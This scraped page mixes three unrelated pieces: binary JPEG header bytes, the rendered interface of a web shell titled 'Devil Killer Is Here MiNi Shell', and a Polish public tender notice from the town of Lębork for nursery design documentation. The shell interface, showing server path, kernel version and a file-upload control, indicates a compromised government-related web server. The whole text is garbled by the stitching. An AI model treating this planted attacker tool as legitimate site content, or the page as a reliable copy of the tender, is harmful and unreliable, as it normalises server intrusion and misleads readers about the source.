JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231206/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231206/0053395701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie dokumentacji projektowo-kosztorysowej budowy żłobka na ul. E. Plater w Lęborku. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Lębork</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979737</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Armii Krajowej 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lębork</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">598624280</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">inwestycje@um.lebork.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.lebork.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie dokumentacji projektowo-kosztorysowej budowy żłobka na ul. E. Plater w Lęborku. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-70af90a6-903e-11ee-b55a-a22b2d7f700e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00533957</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00057709/20/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.8 Wykonanie dokumentacji projektowo-kosztorysowej żłobka przy ul. E. Plater w Lęborku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.lebork.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://umlebork.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Porozumiewanie się Zamawiającego z Wykonawcami odbywa się drogą elektroniczną przy użyciu Platformy eZamawiajjący Urzędu Miasta Lębork https://umlebork.ezamawiajacy.pl/app/login. Istnieje możliwość kierowania zapytania za pomocą środków komunikacji elektronicznej – e-mail: inwestycje@um.lebork.pl – z zastrzeżeniem wymogów odnośnie poszczególnych oświadczeń i dokumentów określonych w niniejszej SWZ.2.Zaleca się aby Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, posiadał konto na Platformie eZamawiający Urzędu Miasta Lębork.3.Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w regulaminie korzystania z Platformy eZamawiający dostępnym pod adresem https://umlebork.ezamawiajacy.pl/app/login w zakładce Baza Wiedzy. 4.Za datę przekazania oferty, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na Platformę eZamawiającego. 5.Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email inwestycje@um.lebork.pl.6. Sposób sporządzania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452). 7.Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ. 8.Uprawnionym przez Zamawiającego do kontaktów z Wykonawcami jest mgr inż. Romuald Babul – Naczelnik Wydziału Realizacji Inwestycji w siedzibie Zamawiającego, tel. 59 86-37-753, tel. kom. 608 584 785.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych ) (Dz. Urz. UE<br/>L 119 z 04.05.2016 r., str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1.1.administratorem danych osobowych jest Urząd Miejski w Lęborku, ul. Armii Krajowej 14, 84 300 Lębork, tel. 59 8624 280;<br/>1.2.inspektorem ochrony danych osobowych w Urzędzie Miejskim w Lęborku jest pani Bożena Steciuk, e-mail: iod@um.lebork.pl, tel.<br/>59 8637 733;<br/>1.3.dane osobowe przekazane przez Wykonawcę przetwarzane będą na podstawie art. 6 ust. 1 lit c RODO w celu związanym z<br/>niniejszym postępowaniem o udzielenie zamówienia publicznego na Wykonanie dokumentacji projektowo-kosztorysowej rozbudowy<br/>Stadionu Miejskiego w Lęborku, prowadzonym w trybie podstawowym bez przeprowadzenia negocjacji na podst.art.275 pkt.1.<br/>1.4.odbiorcami danych osobowych przekazanych przez Wykonawcę będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych<br/>(Dz. U. z 2018 r. poz. 1986, 2215, z 2019 r. poz. 53.), dalej Ustawa Pzp;<br/>1.5.dane osobowe przekazane przez Wykonawcę będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 5 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia;1.6.obowiązek podania przez Wykonawcę danych osobowych bezpośrednio dotyczących Wykonawcy jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego, konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>1.7.w odniesieniu do danych osobowych przekazanych przez Wykonawcę decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO;<br/>Zamówienie udzielane jest w trybie podstawowym na<br/>podstawie: art. 275 pkt 1 ustawy - Usługi<br/>1.8.Wykonawca posiada:<br/>1.8.1.na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>1.8.2.na podstawie art. 16 RODO prawo do sprostowania danych osobowych Wykonawcy;<br/>1.8.3.na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>1.8.4.prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie danych<br/>osobowych dotyczących Wykonawcy narusza przepisy RODO;<br/>1.9.Wykonawcy nie przysługuje:<br/>1.9.1.w związku z art. 17 ust. 3 lit. b d lub e RODO prawo do usunięcia danych osobowych;<br/>1.9.2.prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.44.2023.W</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 241331,79 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest opracowanie dokumentacji projektowo-kosztorysowej wraz z uzyskaniem decyzji pozwolenia na budowę, zmiany sposobu użytkowania i rozbudowy budynku Przedszkola nr 2 w Lęborku na funkcję żłobka oraz przebudowy i zmiany sposobu użytkowania budynku szkolno-przedszkolnego na funkcję przedszkolną.<br/>1.	Numer kategorii wg Wspólnego Słownika Zamówień:<br/>71320000-7 – usługi inżynieryjne w zakresie projektowania,<br/>71244000-0 – kalkulacja kosztów, monitoring kosztów.<br/>2.	Przedmiot zamówienia:<br/>2.1. Należy wykonać zgodnie z Koncepcją programowo-przestrzenną zmiany sposobu użytkowania i rozbudowy budynku przedszkola na dz. nr 47/2 w Lęborku na funkcje żłobka z kuchnią w części dwukondygnacyjnej oraz przebudowa i zmiana sposobu użytkowania budynku szkolno-przedszkolnego na dz. nr 46/2 na funkcję przedszkolną stanowiącą załącznik nr 9 do SWZ.<br/>2.2.	Dodatkowo wykonać:<br/>2.2.1.	Projekt wyposażenia placu zabaw z bezpieczną nawierzchnią zawierający: zestaw sprawnościowy z fundamentami, bujak podwójny na sprężynie z fundamentami, huśtawkę typ bocianie gniazdo z fundamentami, ogrodzenie.<br/>2.2.2.	Należy zagospodarować teren przynależny do instytucji: wiata śmietnikowa, chodnik, parking dla rowerów, zieleń.<br/>2.2.3.	Wszystkie niezbędne opracowania projektowe (w tym PZP, projekt architektoniczno-budowlany, projekt techniczny i projekt wykonawczy, STWiORB, przedmiar i kosztorys) w ilości 5 egzemplarzy i na nośniku przenośnym, uzyskać w imieniu i na rzecz Zamawiającego konieczne opinie i warunki techniczne, wszelkie uzgodnienia, pozwolenia, zezwolenia, decyzje.<br/>3.	Zamawiający zastrzega sobie prawo wglądu do zamówionych prac projektowych w trakcie ich sporządzania.<br/>3.1.	Wykonawca jest zobowiązany przedłożyć i uzgodnić z Zamawiającym wstępną koncepcję projektu.<br/>3.2.	Wykonawca projektów przeniesie na Zamawiającego autorskie prawa majątkowe w całości, automatycznie z chwilą wypłacenia przez Zamawiającego wynagrodzenia za opracowania.<br/>3.3.	Zamawiający może wykorzystać przedmiotowy projekt w całości lub w dowolnych częściach przy dalszych etapach realizacyjnych.<br/>4.	Przed złożeniem oferty i ustaleniem wartości ryczałtowej prac należy dokładnie przeanalizować opis przedmiotu zamówienia z załączonymi materiałami. Wykonawca dokona dokładnego rozpoznania, co do ryzyka, trudności i wszelkich innych okoliczności jakie mogą wpłynąć na wykonanie zamówienia.<br/>5.	Wartość ryczałtowa zamówienia winna uwzględniać wszystkie punkty OPISU PRZEDMIOTU ZAMÓWIENIA.<br/>6.	Obowiązkiem Wykonawcy będzie, bezpośrednio przed podpisaniem umowy, w uzgodnieniu z Zamawiającym dokonanie podziału przedmiotu zamówienia na elementy rozliczeniowe, a następnie określenie kosztów i terminów wykonania poszczególnych elementów. Wzór tabeli elementów rozliczeniowych stanowi Załącznik nr 8 do SWZ, którego nie należy wypełniać przy składaniu oferty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71244000-0 - Kalkulacja kosztów, monitoring kosztów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający przy wyborze najkorzystniejszej oferty posługiwać się będzie następującymi kryteriami:<br/>a. Kryterium „Cena oferty” (C) - waga kryterium 60%<br/>Przyjmuje się, że oferta z najniższą ceną otrzyma 60 pkt.<br/><br/> cena najniższa<br/>	C = --------------------------------- x 60 pkt<br/> cena danej oferty<br/><br/>b. Kryterium „Okres gwarancji” (G) – długość okresu gwarancji (nie mniej niż 36 miesięcy, nie więcej niż 60 miesiące) – 40%.<br/><br/>Jeżeli Wykonawca wskaże w ofercie okres gwarancji powyżej 60 miesięcy, Zamawiający przyjmie do obliczeń wartość 60 miesięcy.<br/>Oferty są punktowane liniowo wedle następującej formuły arytmetycznej:<br/><br/><br/> (Xi – 36)<br/>G = liczba punktów = * 40 pkt<br/> (84 - 36)<br/>gdzie:<br/>Xi - liczba pełnych miesięcy okresu gwarancji ocenianej oferty (nie mniej niż obowiązkowe 36 miesięcy i nie więcej niż maksymalne 60 miesiące).<br/>UWAGA: <br/>Czas trwania okresu gwarancji należy określić w pełnych miesiącach, liczony od miesiąca następnego, w którym nastąpił odbiór końcowy przedmiotu zamówienia.<br/><br/>2.	Łączna punktacja oferty = suma punktów (C + G)<br/>gdzie:<br/>C – liczba punktów, jaką może zdobyć oferta (Wykonawca) za kryterium „Cena”<br/>G – liczba punktów, jaką może zdobyć oferta (Wykonawca) za kryterium „Okres gwarancji”<br/>Maksymalna liczba punktów: 100<br/>3.	Oferta, która uzyska najwyższą łączną punktację, uważana jest za ofertę najkorzystniejszą.<br/>4.	Maksymalna liczba punktów, jaką może zdobyć Wykonawca uwzględniając wszystkie kryteria oceny ofert, wynosi 100 pkt. Za najwyżej ocenioną zostanie uznana oferta, która otrzyma najwyższą liczbę punktów. W przypadku równej ilości punktów za najkorzystniejszą ofertę zostanie uznana oferta, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>5.	Brak wypełnienia przez Wykonawcę w formularzu oferty ceny lub innego kryterium oceny ofert spowoduje odrzucenie oferty jako niezgodnej z treścią SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Spełnienie warunku będzie oceniane na podstawie wykazania przez Wykonawcę wykonania nie wcześniej niż w okresie ostatnich 7 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej opracowania jednej dokumentacji projektowej budowy, rozbudowy, przebudowy budynku żłobka lub przedszkola o pow. min.1500 m2.<br/>Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie załączonych do oferty dokumentów i oświadczeń, określonych w Dziale VII pkt 3.1 SWZ, zgodnie z formułą ,,spełnia – nie spełnia”. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie<br/>Wykonawcy/Podmiotu udostępniającego zasoby w zakresie podstaw wykluczenia z postepowania na podstawie art. 7 ust. 1 UOBN –<br/>Załącznik nr 6 do SWZ.<br/>2.Oświadczenie Wykonawcy dotyczące przynależności do grupy kapitałowej– zgodnie z Załącznikiem nr 4 do SWZ.<br/>Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do<br/>zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.<br/>W przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia każdy z Wykonawców składa osobno w/w<br/>oświadczenie.<br/>3.Oświadczenie Wykonawcy/Podmiotu udostępniającego zasoby w zakresie podstaw wykluczenia z postępowania – Załącznik nr 5<br/>do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.Wykaz usług wykonanych w okresie ostatnich 7 lat a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane, z załączeniem dowodów<br/>określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie<br/>jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy (wykaz usług zgodnie z Załącznikiem nr 3 do SWZ).<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonanych wspólnie z innymi wykonawcami wykaz usług<br/>dotyczyć ma usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>2.Oświadczenie Wykonawcy/Podmiotu udostępniającego zasoby dotyczące spełnienia warunku udziału w postępowaniu – według<br/>Załącznika nr 2 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.Wykaz usług wykonanych w okresie ostatnich 7 lat a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane, z załączeniem dowodów<br/>określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie<br/>jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy (wykaz usług zgodnie z Załącznikiem nr 3 do SWZ).<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonanych wspólnie z innymi wykonawcami wykaz usług<br/>dotyczyć ma usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>2.Oświadczenie Wykonawcy/Podmiotu udostępniającego zasoby dotyczące spełnienia warunku udziału w postępowaniu – według<br/>Załącznika nr 2 do SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oświadczenie Wykonawcy dotyczące przynależności do grupy kapitałowej.<br/>Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.<br/>W przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia każdy z Wykonawców składa osobno w/w oświadczenie.<br/>2.6. W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania, zamawiający żąda od Wykonawcy odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. Wykonawca jest zobowiązany do złożenia w/w dokumentów, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>W przypadku gdy 